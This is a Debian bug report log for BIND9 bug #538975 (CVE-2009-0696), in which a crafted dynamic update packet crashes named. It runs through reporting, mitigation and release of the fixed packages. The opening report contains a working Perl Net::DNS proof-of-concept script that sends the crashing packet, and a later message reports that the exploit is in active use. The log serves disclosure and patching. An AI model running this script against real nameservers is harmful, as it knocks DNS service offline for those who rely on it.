Debian Bug report logs -
#538975
bind9 dies with assertion failure (db.c:579)
Reported by: Micha Krause <debianbugs@noris.net>
Date: Tue, 28 Jul 2009 09:30:02 UTC
Severity: serious
Tags: security
Fixed in versions bind9/1:9.6.1.dfsg.P1-1, bind9/1:9.5.1.dfsg.P3-1
Done: LaMont Jones <lamont@debian.org>
Bug is archived. No further changes may be made.
Toggle useless messages
Report forwarded
to debian-bugs-dist@lists.debian.org, LaMont Jones <lamont@debian.org>:
Bug#538975; Package bind9.
(Tue, 28 Jul 2009 09:30:05 GMT) (full text, mbox, link).
Acknowledgement sent
to Micha Krause <debianbugs@noris.net>:
New Bug report received and forwarded. Copy sent to LaMont Jones <lamont@debian.org>.
(Tue, 28 Jul 2009 09:30:05 GMT) (full text, mbox, link).
Message #5 received at submit@bugs.debian.org (full text, mbox, reply):
Package: bind9
Severity: normal
bind can be crashed with an update packet:
Packet in tcpdump:
15:38:11.676045 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto: UDP (17), length: 178) 10.2.0.205.59447 > 10.2.0.205.53: 17378 update [1a] [1n] [1au] SOA? 8.0.10.in-addr.arpa. 8.8.0.10.in-addr.arpa. ANY ns: [|domain]
Another view of the Packet:
| ;; HEADER SECTION
| ;; id = 181
| ;; qr = 0 opcode = UPDATE rcode = NOERROR
| ;; zocount = 1 prcount = 1 upcount = 1 adcount = 1
|
| ;; ZONE SECTION (1 record)
| ;; 8.0.10.in-addr.arpa. IN SOA
|
| ;; PREREQUISITE SECTION (1 record)
| 4.8.0.10.in-addr.arpa. 0 IN ANY ; no data
|
| ;; UPDATE SECTION (1 record)
| 4.8.0.10.in-addr.arpa. 0 ANY ANY ; no data
|
| ;; ADDITIONAL SECTION (1 record)
| office.example.com. 0 ANY TSIG HMAC-MD5.SIG-ALG.REG.INT. NOERROR
Such a packet can be created with perl:
-----------------
#!/usr/bin/perl -w
use Net::DNS;
our $NSI = '<dns server>';
our $NSI_KEY_NAME = '<key name>';
our $NSI_KEY = '<key>';
my $rzone = '<zone>';
my $rptr = "1.$rzone";
my $packet = Net::DNS::Update->new($rzone);
$packet->push(
pre => Net::DNS::RR->new(
Name => $rptr,
Class => 'IN',
Type => 'ANY',
TTL => 0,
)
);
$packet->push(
update => Net::DNS::RR->new(
Name => $rptr,
Class => 'ANY',
Type => 'ANY',
)
);
$packet->sign_tsig( $NSI_KEY_NAME, $NSI_KEY ) if $NSI_KEY_NAME && $NSI_KEY;
print $packet->string;
Net::DNS::Resolver->new( nameservers => [$NSI] )->send($packet);
--------------------
bind only crashes, if the used fqdn exists on the nameserver.
-- System Information:
Debian Release: 5.0.2
APT prefers proposed-updates
APT policy: (500, 'proposed-updates'), (500, 'stable')
Architecture: i386 (i686)
Kernel: Linux 2.6.26-1-xen-686 (SMP w/1 CPU core)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
Added tag(s) security.
Request was from Matthias Urlichs <smurf@smurf.noris.de>
to control@bugs.debian.org.
(Tue, 28 Jul 2009 12:33:13 GMT) (full text, mbox, link).
Severity set to 'serious' from 'normal'
Request was from Matthias Urlichs <smurf@smurf.noris.de>
to control@bugs.debian.org.
(Tue, 28 Jul 2009 12:33:14 GMT) (full text, mbox, link).
Information forwarded
to debian-bugs-dist@lists.debian.org, LaMont Jones <lamont@debian.org>:
Bug#538975; Package bind9.
(Tue, 28 Jul 2009 20:12:06 GMT) (full text, mbox, link).
Acknowledgement sent
to Thijs Kinkhorst <thijs@debian.org>:
Extra info received and forwarded to list. Copy sent to LaMont Jones <lamont@debian.org>.
(Tue, 28 Jul 2009 20:12:07 GMT) (full text, mbox, link).
Message #14 received at 538975@bugs.debian.org (full text, mbox, reply):
[Message part 1 (text/plain, inline)]
This is CVE-2009-0696 and CERT VU#725188.
Please reference them in any relevant changelogs.
[signature.asc (application/pgp-signature, inline)]
Information forwarded
to debian-bugs-dist@lists.debian.org, LaMont Jones <lamont@debian.org>:
Bug#538975; Package bind9.
(Wed, 29 Jul 2009 00:36:02 GMT) (full text, mbox, link).
Acknowledgement sent
to Michael Holzt <debian-bugreports@michael.holzt.de>:
Extra info received and forwarded to list. Copy sent to LaMont Jones <lamont@debian.org>.
(Wed, 29 Jul 2009 00:36:02 GMT) (full text, mbox, link).
Message #19 received at 538975@bugs.debian.org (full text, mbox, reply):
As a hint for other sysadmins:
For the time until a fixed debian package is available, this iptables rule
should filter all dnsupdate packets, thus mitigating the attack:
| iptables -A INPUT -p udp --dport 53 -j DROP -m u32 --u32 '30>>27&0xF=5'
Works for me, but no guaranty. I have added a second rule which logs
said dnsupdate packets and i already got several such packets from the
outside world, so the exploit is clearly in active use and the least you
can do is to try the iptables rule.
Regards
Michael
--
It's an insane world, but i'm proud to be a part of it. -- Bill Hicks
Reply sent
to LaMont Jones <lamont@debian.org>:
You have taken responsibility.
(Wed, 29 Jul 2009 05:15:08 GMT) (full text, mbox, link).
Notification sent
to Micha Krause <debianbugs@noris.net>:
Bug acknowledged by developer.
(Wed, 29 Jul 2009 05:15:08 GMT) (full text, mbox, link).
Message #24 received at 538975-close@bugs.debian.org (full text, mbox, reply):
Source: bind9
Source-Version: 1:9.6.1.dfsg.P1-1
We believe that the bug you reported is fixed in the latest version of
bind9, which is due to be installed in the Debian FTP archive:
bind9-doc_9.6.1.dfsg.P1-1_all.deb
to pool/main/b/bind9/bind9-doc_9.6.1.dfsg.P1-1_all.deb
bind9-host_9.6.1.dfsg.P1-1_amd64.deb
to pool/main/b/bind9/bind9-host_9.6.1.dfsg.P1-1_amd64.deb
bind9_9.6.1.dfsg.P1-1.diff.gz
to pool/main/b/bind9/bind9_9.6.1.dfsg.P1-1.diff.gz
bind9_9.6.1.dfsg.P1-1.dsc
to pool/main/b/bind9/bind9_9.6.1.dfsg.P1-1.dsc
bind9_9.6.1.dfsg.P1-1_amd64.deb
to pool/main/b/bind9/bind9_9.6.1.dfsg.P1-1_amd64.deb
bind9_9.6.1.dfsg.P1.orig.tar.gz
to pool/main/b/bind9/bind9_9.6.1.dfsg.P1.orig.tar.gz
bind9utils_9.6.1.dfsg.P1-1_amd64.deb
to pool/main/b/bind9/bind9utils_9.6.1.dfsg.P1-1_amd64.deb
dnsutils_9.6.1.dfsg.P1-1_amd64.deb
to pool/main/b/bind9/dnsutils_9.6.1.dfsg.P1-1_amd64.deb
libbind-dev_9.6.1.dfsg.P1-1_amd64.deb
to pool/main/b/bind9/libbind-dev_9.6.1.dfsg.P1-1_amd64.deb
libbind9-50_9.6.1.dfsg.P1-1_amd64.deb
to pool/main/b/bind9/libbind9-50_9.6.1.dfsg.P1-1_amd64.deb
libdns50_9.6.1.dfsg.P1-1_amd64.deb
to pool/main/b/bind9/libdns50_9.6.1.dfsg.P1-1_amd64.deb
libisc50_9.6.1.dfsg.P1-1_amd64.deb
to pool/main/b/bind9/libisc50_9.6.1.dfsg.P1-1_amd64.deb
libisccc50_9.6.1.dfsg.P1-1_amd64.deb
to pool/main/b/bind9/libisccc50_9.6.1.dfsg.P1-1_amd64.deb
libisccfg50_9.6.1.dfsg.P1-1_amd64.deb
to pool/main/b/bind9/libisccfg50_9.6.1.dfsg.P1-1_amd64.deb
liblwres50_9.6.1.dfsg.P1-1_amd64.deb
to pool/main/b/bind9/liblwres50_9.6.1.dfsg.P1-1_amd64.deb
lwresd_9.6.1.dfsg.P1-1_amd64.deb
to pool/main/b/bind9/lwresd_9.6.1.dfsg.P1-1_amd64.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 538975@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
LaMont Jones <lamont@debian.org> (supplier of updated bind9 package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.7
Date: Tue, 28 Jul 2009 22:03:14 -0600
Source: bind9
Binary: bind9 bind9utils bind9-doc bind9-host libbind-dev libbind9-50 libdns50 libisc50 liblwres50 libisccc50 libisccfg50 dnsutils lwresd
Architecture: all amd64 source
Version: 1:9.6.1.dfsg.P1-1
Distribution: unstable
Urgency: low
Maintainer: LaMont Jones <lamont@debian.org>
Changed-By: LaMont Jones <lamont@debian.org>
Description:
bind9 - Internet Domain Name Server
bind9-doc - Documentation for BIND
bind9-host - Version of 'host' bundled with BIND 9.X
bind9utils - Utilities for BIND
dnsutils - Clients provided with BIND
libbind-dev - Static Libraries and Headers used by BIND
libbind9-50 - BIND9 Shared Library used by BIND
libdns50 - DNS Shared Library used by BIND
libisc50 - ISC Shared Library used by BIND
libisccc50 - Command Channel Library used by BIND
libisccfg50 - Config File Handling Library used by BIND
liblwres50 - Lightweight Resolver Library used by BIND
lwresd - Lightweight Resolver Daemon
Closes: 492308 527137 536487 538975
Changes:
bind9 (1:9.6.1.dfsg.P1-1) unstable; urgency=low
.
[Internet Software Consortium, Inc]
.
* A specially crafted update packet will cause named to exit.
CVE-2009-0696, CERT VU#725188. Closes: #538975
.
[InterNIC]
.
* Update db.root hints file.
.
[LaMont Jones]
.
* Move default zone definitions from named.conf to named.conf.default-zones.
Closes: #492308
* use start-stop-daemon if rndc stop fails. Closes: #536487
* lwresd: pidfile name was wrong in init script. Closes: #527137
Files:
164a8f8147ded4bbf4b0e9328f124e9f 5111118 net optional bind9_9.6.1.dfsg.P1.orig.tar.gz
43c35f13590aba2954e4610c7a02ab13 155178 net standard dnsutils_9.6.1.dfsg.P1-1_amd64.deb
527b68876b5d4595a79f9dccc549b0ba 48274 libs standard liblwres50_9.6.1.dfsg.P1-1_amd64.deb
59df9766351050f85e07c6d0726a3d2c 64734 net standard bind9-host_9.6.1.dfsg.P1-1_amd64.deb
63fff5293fdb68822b6309ca619db8ec 223042 net optional lwresd_9.6.1.dfsg.P1-1_amd64.deb
72d57c6ccc10a4cb6787450af7181759 287206 net optional bind9_9.6.1.dfsg.P1-1_amd64.deb
7b2c88cfdba22e7bac5a91e070371f61 32372 libs standard libbind9-50_9.6.1.dfsg.P1-1_amd64.deb
800a0a5ae07445bd4a7259c747feeeab 29062 libs optional libisccc50_9.6.1.dfsg.P1-1_amd64.deb
80292d564e28c966e5700846edc233f9 167044 libs standard libisc50_9.6.1.dfsg.P1-1_amd64.deb
a1aec096f32ea6ec12319182c2e8b235 100246 net optional bind9utils_9.6.1.dfsg.P1-1_amd64.deb
acd155f197737a2566897c6fd1ffa7a2 1403022 libdevel optional libbind-dev_9.6.1.dfsg.P1-1_amd64.deb
74243684fd7b5a713e63baf068cfaf3d 1083 net optional bind9_9.6.1.dfsg.P1-1.dsc
bb587214860aacca9df33121d5ff41a1 219593 net optional bind9_9.6.1.dfsg.P1-1.diff.gz
c4e0a3b5cc3e9ee37f04f951a9d4a2c0 51146 libs optional libisccfg50_9.6.1.dfsg.P1-1_amd64.deb
ce7783dc0f2f7b02c35deb8e2b2cf731 280618 doc optional bind9-doc_9.6.1.dfsg.P1-1_all.deb
e34ac089d6e1236532e77024e3564761 653592 libs standard libdns50_9.6.1.dfsg.P1-1_amd64.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
iD8DBQFKb84lzN/kmwoKyScRAtLgAJ9oeGH3WEVMgiSlrNISFHK2SUeuaQCeKs/g
fueONBapV0I1fCnLD0AEe0w=
=7Pf7
-----END PGP SIGNATURE-----
Added tag(s) pending.
Request was from LaMont Jones <lamont@debian.org>
to control@bugs.debian.org.
(Wed, 29 Jul 2009 05:36:02 GMT) (full text, mbox, link).
Information forwarded
to debian-bugs-dist@lists.debian.org, LaMont Jones <lamont@debian.org>:
Bug#538975; Package bind9.
(Wed, 29 Jul 2009 19:03:02 GMT) (full text, mbox, link).
Acknowledgement sent
to Yuriy Kolesnikov <yurikoles@gmail.com>:
Extra info received and forwarded to list. Copy sent to LaMont Jones <lamont@debian.org>.
(Wed, 29 Jul 2009 19:03:02 GMT) (full text, mbox, link).
Message #31 received at 538975@bugs.debian.org (full text, mbox, reply):
[Message part 1 (text/plain, inline)]
How to install update in testing? I uncommenteddeb
http://security.debian.org/debian/ stable/updates main contrib non-free
But there is no update!
[Message part 2 (text/html, inline)]
Information forwarded
to debian-bugs-dist@lists.debian.org, LaMont Jones <lamont@debian.org>:
Bug#538975; Package bind9.
(Wed, 29 Jul 2009 19:27:09 GMT) (full text, mbox, link).
Acknowledgement sent
to Ondřej Surý <ondrej@sury.org>:
Extra info received and forwarded to list. Copy sent to LaMont Jones <lamont@debian.org>.
(Wed, 29 Jul 2009 19:27:09 GMT) (full text, mbox, link).
Message #36 received at 538975@bugs.debian.org (full text, mbox, reply):
If you use testing, for sure, you know about:
http://lists.debian.org/debian-testing-security-announce/2008/12/msg00019.html
Ondrej
On Wed, Jul 29, 2009 at 18:59, Yuriy Kolesnikov<yurikoles@gmail.com> wrote:
> How to install update in testing? I uncommented
> deb http://security.debian.org/debian/ stable/updates main contrib non-free
> But there is no update!
--
Ondřej Surý <ondrej@sury.org>
http://blog.rfc1925.org/
Reply sent
to LaMont Jones <lamont@debian.org>:
You have taken responsibility.
(Sun, 02 Aug 2009 20:45:07 GMT) (full text, mbox, link).
Notification sent
to Micha Krause <debianbugs@noris.net>:
Bug acknowledged by developer.
(Sun, 02 Aug 2009 20:45:08 GMT) (full text, mbox, link).
Message #41 received at 538975-close@bugs.debian.org (full text, mbox, reply):
Source: bind9
Source-Version: 1:9.5.1.dfsg.P3-1
We believe that the bug you reported is fixed in the latest version of
bind9, which is due to be installed in the Debian FTP archive:
bind9-doc_9.5.1.dfsg.P3-1_all.deb
to pool/main/b/bind9/bind9-doc_9.5.1.dfsg.P3-1_all.deb
bind9-host_9.5.1.dfsg.P3-1_amd64.deb
to pool/main/b/bind9/bind9-host_9.5.1.dfsg.P3-1_amd64.deb
bind9_9.5.1.dfsg.P3-1.diff.gz
to pool/main/b/bind9/bind9_9.5.1.dfsg.P3-1.diff.gz
bind9_9.5.1.dfsg.P3-1.dsc
to pool/main/b/bind9/bind9_9.5.1.dfsg.P3-1.dsc
bind9_9.5.1.dfsg.P3-1_amd64.deb
to pool/main/b/bind9/bind9_9.5.1.dfsg.P3-1_amd64.deb
bind9_9.5.1.dfsg.P3.orig.tar.gz
to pool/main/b/bind9/bind9_9.5.1.dfsg.P3.orig.tar.gz
bind9utils_9.5.1.dfsg.P3-1_amd64.deb
to pool/main/b/bind9/bind9utils_9.5.1.dfsg.P3-1_amd64.deb
dnsutils_9.5.1.dfsg.P3-1_amd64.deb
to pool/main/b/bind9/dnsutils_9.5.1.dfsg.P3-1_amd64.deb
libbind-dev_9.5.1.dfsg.P3-1_amd64.deb
to pool/main/b/bind9/libbind-dev_9.5.1.dfsg.P3-1_amd64.deb
libbind9-40_9.5.1.dfsg.P3-1_amd64.deb
to pool/main/b/bind9/libbind9-40_9.5.1.dfsg.P3-1_amd64.deb
libdns45_9.5.1.dfsg.P3-1_amd64.deb
to pool/main/b/bind9/libdns45_9.5.1.dfsg.P3-1_amd64.deb
libisc45_9.5.1.dfsg.P3-1_amd64.deb
to pool/main/b/bind9/libisc45_9.5.1.dfsg.P3-1_amd64.deb
libisccc40_9.5.1.dfsg.P3-1_amd64.deb
to pool/main/b/bind9/libisccc40_9.5.1.dfsg.P3-1_amd64.deb
libisccfg40_9.5.1.dfsg.P3-1_amd64.deb
to pool/main/b/bind9/libisccfg40_9.5.1.dfsg.P3-1_amd64.deb
liblwres40_9.5.1.dfsg.P3-1_amd64.deb
to pool/main/b/bind9/liblwres40_9.5.1.dfsg.P3-1_amd64.deb
lwresd_9.5.1.dfsg.P3-1_amd64.deb
to pool/main/b/bind9/lwresd_9.5.1.dfsg.P3-1_amd64.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 538975@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
LaMont Jones <lamont@debian.org> (supplier of updated bind9 package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.7
Date: Tue, 28 Jul 2009 22:48:28 -0600
Source: bind9
Binary: bind9 bind9utils bind9-doc bind9-host libbind-dev libbind9-40 libdns45 libisc45 liblwres40 libisccc40 libisccfg40 dnsutils lwresd
Architecture: all amd64 source
Version: 1:9.5.1.dfsg.P3-1
Distribution: stable-security
Urgency: low
Maintainer: LaMont Jones <lamont@debian.org>
Changed-By: LaMont Jones <lamont@debian.org>
Description:
bind9 - Internet Domain Name Server
bind9-doc - Documentation for BIND
bind9-host - Version of 'host' bundled with BIND 9.X
bind9utils - Utilities for BIND
dnsutils - Clients provided with BIND
libbind-dev - Static Libraries and Headers used by BIND
libbind9-40 - BIND9 Shared Library used by BIND
libdns45 - DNS Shared Library used by BIND
libisc45 - ISC Shared Library used by BIND
libisccc40 - Command Channel Library used by BIND
libisccfg40 - Config File Handling Library used by BIND
liblwres40 - Lightweight Resolver Library used by BIND
lwresd - Lightweight Resolver Daemon
Closes: 538975
Changes:
bind9 (1:9.5.1.dfsg.P3-1) stable-security; urgency=low
.
[Internet Software Consortium, Inc]
.
* A specially crafted update packet will cause named to exit.
CVE-2009-0696, CERT VU#725188. Closes: #538975
Files:
358d0cdea486df897666661d78b7a8e5 601910 libs standard libdns45_9.5.1.dfsg.P3-1_amd64.deb
410430ff014240042b527bfe607621c1 64394 net standard bind9-host_9.5.1.dfsg.P3-1_amd64.deb
5d086997e4b13abb6bea5ad3c1920f08 1332918 libdevel optional libbind-dev_9.5.1.dfsg.P3-1_amd64.deb
6315afa492be63b377fe44126ae82b1b 50634 libs standard libisccfg40_9.5.1.dfsg.P3-1_amd64.deb
684dcaa493c32e3596b3685c26f173aa 154944 net standard dnsutils_9.5.1.dfsg.P3-1_amd64.deb
82679c58157e3aead368abb56dd39aa3 31816 libs standard libbind9-40_9.5.1.dfsg.P3-1_amd64.deb
8e109829ee1dd553cf4799cd9af7ef2f 1049 net optional bind9_9.5.1.dfsg.P3-1.dsc
9e7a5a67b9c681e836bd0bfa0b779004 163698 libs standard libisc45_9.5.1.dfsg.P3-1_amd64.deb
ab42f6daa6d079035ef6a16eb644dabf 212176 net optional lwresd_9.5.1.dfsg.P3-1_amd64.deb
bc456e91b46eab565438222f0b6e97d2 264860 doc optional bind9-doc_9.5.1.dfsg.P3-1_all.deb
c878e3c0edb31dca8e74b42a0fa06efc 224291 net optional bind9_9.5.1.dfsg.P3-1.diff.gz
d94a961e42289f1b1978f2b66add6dec 28820 libs standard libisccc40_9.5.1.dfsg.P3-1_amd64.deb
dc87f5d14403bee19b0c1d04b4de9252 5221004 net optional bind9_9.5.1.dfsg.P3.orig.tar.gz
df3664fb075f561d9b519a5517154b14 97132 net optional bind9utils_9.5.1.dfsg.P3-1_amd64.deb
e193057861c47e3fad50884ffd8a5d5c 48110 libs standard liblwres40_9.5.1.dfsg.P3-1_amd64.deb
f3fd746ba24e74230cba606b0a5f61ea 255048 net optional bind9_9.5.1.dfsg.P3-1_amd64.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
iD8DBQFKb+DbzN/kmwoKyScRAtLaAJ4tTc8UsPadqLdtMwcWFuKJa4T2dQCfQ9OX
0gCyOrrhUy9K5OoHTAqIScM=
=9vlB
-----END PGP SIGNATURE-----
Reply sent
to LaMont Jones <lamont@debian.org>:
You have taken responsibility.
(Fri, 04 Sep 2009 19:15:35 GMT) (full text, mbox, link).
Notification sent
to Micha Krause <debianbugs@noris.net>:
Bug acknowledged by developer.
(Fri, 04 Sep 2009 19:15:35 GMT) (full text, mbox, link).
Message #46 received at 538975-close@bugs.debian.org (full text, mbox, reply):
Source: bind9
Source-Version: 1:9.5.1.dfsg.P3-1
We believe that the bug you reported is fixed in the latest version of
bind9, which is due to be installed in the Debian FTP archive:
bind9-doc_9.5.1.dfsg.P3-1_all.deb
to pool/main/b/bind9/bind9-doc_9.5.1.dfsg.P3-1_all.deb
bind9-host_9.5.1.dfsg.P3-1_amd64.deb
to pool/main/b/bind9/bind9-host_9.5.1.dfsg.P3-1_amd64.deb
bind9_9.5.1.dfsg.P3-1.diff.gz
to pool/main/b/bind9/bind9_9.5.1.dfsg.P3-1.diff.gz
bind9_9.5.1.dfsg.P3-1.dsc
to pool/main/b/bind9/bind9_9.5.1.dfsg.P3-1.dsc
bind9_9.5.1.dfsg.P3-1_amd64.deb
to pool/main/b/bind9/bind9_9.5.1.dfsg.P3-1_amd64.deb
bind9_9.5.1.dfsg.P3.orig.tar.gz
to pool/main/b/bind9/bind9_9.5.1.dfsg.P3.orig.tar.gz
bind9utils_9.5.1.dfsg.P3-1_amd64.deb
to pool/main/b/bind9/bind9utils_9.5.1.dfsg.P3-1_amd64.deb
dnsutils_9.5.1.dfsg.P3-1_amd64.deb
to pool/main/b/bind9/dnsutils_9.5.1.dfsg.P3-1_amd64.deb
libbind-dev_9.5.1.dfsg.P3-1_amd64.deb
to pool/main/b/bind9/libbind-dev_9.5.1.dfsg.P3-1_amd64.deb
libbind9-40_9.5.1.dfsg.P3-1_amd64.deb
to pool/main/b/bind9/libbind9-40_9.5.1.dfsg.P3-1_amd64.deb
libdns45_9.5.1.dfsg.P3-1_amd64.deb
to pool/main/b/bind9/libdns45_9.5.1.dfsg.P3-1_amd64.deb
libisc45_9.5.1.dfsg.P3-1_amd64.deb
to pool/main/b/bind9/libisc45_9.5.1.dfsg.P3-1_amd64.deb
libisccc40_9.5.1.dfsg.P3-1_amd64.deb
to pool/main/b/bind9/libisccc40_9.5.1.dfsg.P3-1_amd64.deb
libisccfg40_9.5.1.dfsg.P3-1_amd64.deb
to pool/main/b/bind9/libisccfg40_9.5.1.dfsg.P3-1_amd64.deb
liblwres40_9.5.1.dfsg.P3-1_amd64.deb
to pool/main/b/bind9/liblwres40_9.5.1.dfsg.P3-1_amd64.deb
lwresd_9.5.1.dfsg.P3-1_amd64.deb
to pool/main/b/bind9/lwresd_9.5.1.dfsg.P3-1_amd64.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 538975@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
LaMont Jones <lamont@debian.org> (supplier of updated bind9 package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.7
Date: Tue, 28 Jul 2009 22:48:28 -0600
Source: bind9
Binary: bind9 bind9utils bind9-doc bind9-host libbind-dev libbind9-40 libdns45 libisc45 liblwres40 libisccc40 libisccfg40 dnsutils lwresd
Architecture: all amd64 source
Version: 1:9.5.1.dfsg.P3-1
Distribution: stable-security
Urgency: low
Maintainer: LaMont Jones <lamont@debian.org>
Changed-By: LaMont Jones <lamont@debian.org>
Description:
bind9 - Internet Domain Name Server
bind9-doc - Documentation for BIND
bind9-host - Version of 'host' bundled with BIND 9.X
bind9utils - Utilities for BIND
dnsutils - Clients provided with BIND
libbind-dev - Static Libraries and Headers used by BIND
libbind9-40 - BIND9 Shared Library used by BIND
libdns45 - DNS Shared Library used by BIND
libisc45 - ISC Shared Library used by BIND
libisccc40 - Command Channel Library used by BIND
libisccfg40 - Config File Handling Library used by BIND
liblwres40 - Lightweight Resolver Library used by BIND
lwresd - Lightweight Resolver Daemon
Closes: 538975
Changes:
bind9 (1:9.5.1.dfsg.P3-1) stable-security; urgency=low
.
[Internet Software Consortium, Inc]
.
* A specially crafted update packet will cause named to exit.
CVE-2009-0696, CERT VU#725188. Closes: #538975
Files:
358d0cdea486df897666661d78b7a8e5 601910 libs standard libdns45_9.5.1.dfsg.P3-1_amd64.deb
410430ff014240042b527bfe607621c1 64394 net standard bind9-host_9.5.1.dfsg.P3-1_amd64.deb
5d086997e4b13abb6bea5ad3c1920f08 1332918 libdevel optional libbind-dev_9.5.1.dfsg.P3-1_amd64.deb
6315afa492be63b377fe44126ae82b1b 50634 libs standard libisccfg40_9.5.1.dfsg.P3-1_amd64.deb
684dcaa493c32e3596b3685c26f173aa 154944 net standard dnsutils_9.5.1.dfsg.P3-1_amd64.deb
82679c58157e3aead368abb56dd39aa3 31816 libs standard libbind9-40_9.5.1.dfsg.P3-1_amd64.deb
8e109829ee1dd553cf4799cd9af7ef2f 1049 net optional bind9_9.5.1.dfsg.P3-1.dsc
9e7a5a67b9c681e836bd0bfa0b779004 163698 libs standard libisc45_9.5.1.dfsg.P3-1_amd64.deb
ab42f6daa6d079035ef6a16eb644dabf 212176 net optional lwresd_9.5.1.dfsg.P3-1_amd64.deb
bc456e91b46eab565438222f0b6e97d2 264860 doc optional bind9-doc_9.5.1.dfsg.P3-1_all.deb
c878e3c0edb31dca8e74b42a0fa06efc 224291 net optional bind9_9.5.1.dfsg.P3-1.diff.gz
d94a961e42289f1b1978f2b66add6dec 28820 libs standard libisccc40_9.5.1.dfsg.P3-1_amd64.deb
dc87f5d14403bee19b0c1d04b4de9252 5221004 net optional bind9_9.5.1.dfsg.P3.orig.tar.gz
df3664fb075f561d9b519a5517154b14 97132 net optional bind9utils_9.5.1.dfsg.P3-1_amd64.deb
e193057861c47e3fad50884ffd8a5d5c 48110 libs standard liblwres40_9.5.1.dfsg.P3-1_amd64.deb
f3fd746ba24e74230cba606b0a5f61ea 255048 net optional bind9_9.5.1.dfsg.P3-1_amd64.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
iD8DBQFKb+DbzN/kmwoKyScRAtLaAJ4tTc8UsPadqLdtMwcWFuKJa4T2dQCfQ9OX
0gCyOrrhUy9K5OoHTAqIScM=
=9vlB
-----END PGP SIGNATURE-----
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org.
(Sat, 03 Oct 2009 07:44:55 GMT) (full text, mbox, link).
Send a report that this bug log contains spam.
Debian bug tracking system administrator <owner@bugs.debian.org>.
Last modified:
Wed Jun 19 18:20:38 2019;
Machine Name:
buxtehude
Debian Bug tracking system
Debbugs is free software and licensed under the terms of the GNU
Public License version 2. The current version can be obtained
from https://bugs.debian.org/debbugs-source/.
Copyright © 1999 Darren O. Benham,
1997,2003 nCipher Corporation Ltd,
1994-97 Ian Jackson,
2005-2017 Don Armstrong, and many other contributors.
Vulmon